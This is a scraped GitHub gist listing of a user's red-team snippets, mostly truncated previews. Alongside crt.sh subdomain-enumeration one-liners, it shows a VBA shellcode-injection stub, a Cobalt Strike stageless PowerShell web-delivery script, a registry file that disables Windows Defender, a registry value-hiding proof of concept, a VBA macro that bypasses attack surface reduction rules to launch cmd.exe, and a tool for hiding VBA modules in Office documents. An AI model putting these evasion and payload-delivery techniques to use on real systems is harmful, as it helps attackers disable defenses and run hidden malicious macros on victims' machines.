Skip to content

Instantly share code, notes, and snippets.

View TechByTom's full-sized avatar

TechByTom

14 followers · 159 following
View GitHub Profile
@TechByTom
TechByTom / simplecrt.sh
Created December 17, 2020 20:56
Bash one liner to get all certificates from crt.sh
curl -s 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | grep "name_value" | sed 's/\"//g' | cut -d":" -f2- | tr -d '[:blank:]' | sed 's/\\n/\n/g' | tr '[:upper:]' '[:lower:]' | sort -u
@TechByTom
TechByTom / functioninjection.vba
Created December 16, 2020 16:54 — forked from rmdavy/functioninjection.vba
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long
@TechByTom
TechByTom / getCerts
Created December 10, 2020 22:05
Cobalt Strike Cobalt Strike certificate grabber
#!/bin/bash
if [ $# -eq 0 ]
then
echo "Usage: getCSCert.sh yourdomainhere.com"
exit 1
fi
MyDomain="`echo "$1" | tr '[:upper:]' '[:lower:]'`"
sudo service nginx stop
read -p "Add this server to your public port 80 security group, then press any key to continue..."
sudo certbot certonly --standalone --preferred-challenges http -d $MyDomain
@TechByTom
TechByTom / stagelessweb.cna
Created September 1, 2020 16:14 — forked from rsmudge/stagelessweb.cna
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
@TechByTom
TechByTom / Disable Windows Defender
Created June 25, 2020 20:14
Disable windows defender - add to reg, then reboot
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000001
"DisableScanOnRealtimeEnable"=dword:00000001
@TechByTom
TechByTom / ironregistry.py
Created October 1, 2019 00:28 — forked from Graph-X/ironregistry.py
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 Im mr meeseeks',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
@TechByTom
TechByTom / ASR Rules Bypass.vba
Created September 16, 2019 22:30 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@TechByTom
TechByTom / Invoke-HideVBAModule.psm1
Created September 3, 2019 14:54 — forked from williamknows/Invoke-HideVBAModule.psm1
PowerShell cmdlet for hiding VBA modules in Microsoft Office documents
<#
.Synopsis
Used to hide VBA modules from the VBA editor in Microsoft Office documents/templates, but still have them contain executable code.
Script created by William Knowles. @william_knows
Technique originally found by Thegrideon Software: https://www.thegrideon.com/vba-internals.html
.Description
This cmdlet facilitates editing the Word/Excel documents/templates to remove references to VBA modules.
For the older compatibility formats you can edit the file directly with a hex editor and remove module references.
For the newer XML formats that use zip files, you need to unzip them, and edit the vbaProject.bin file.
@TechByTom
TechByTom / gist:9b95499c0511418383d8ab651018b85f
Created August 14, 2019 04:17
List all AWS IPs
https://ip-ranges.amazonaws.com/ip-ranges.json
@TechByTom
TechByTom / get_certs.sh
Created August 4, 2019 19:19 — forked from mikeabreu/get_certs.sh
Certificate Transparency Bash Functions
#!/bin/bash
# Add these functions to your .bashrc or .zshrc and use from your terminal.
get_certs_domains() {
# Credit goes to Ronnie Flathers, taken from https://twitter.com/ropnop/status/972151279463124994
curl -s https://crt.sh\?q\=%25.$1 | awk -v pattern="<TD>.*$1" '$0 ~ pattern {gsub("<[^>]*>","");gsub(//,""); print}' | sort -u
}
get_certs() {
curl -s https://crt.sh\?q\=%25.$1 | awk '/\?id=[0-9]*/{nr[NR]; nr[NR+1]; nr[NR+3]; nr[NR+4]}; NR in nr' | sed 's/<TD style="text-align:center"><A href="?id=//g' | sed 's#">[0-9]*</A></TD>##g' | sed 's#<TD style="text-align:center">##g' | sed 's#</TD>##g' | sed 's#<TD>##g' | sed 's#<A style=["a-z: ?=0-9-]*>##g' | sed 's#</A>##g' | sed 'N;N;N;s/\n/\t\t/g'
}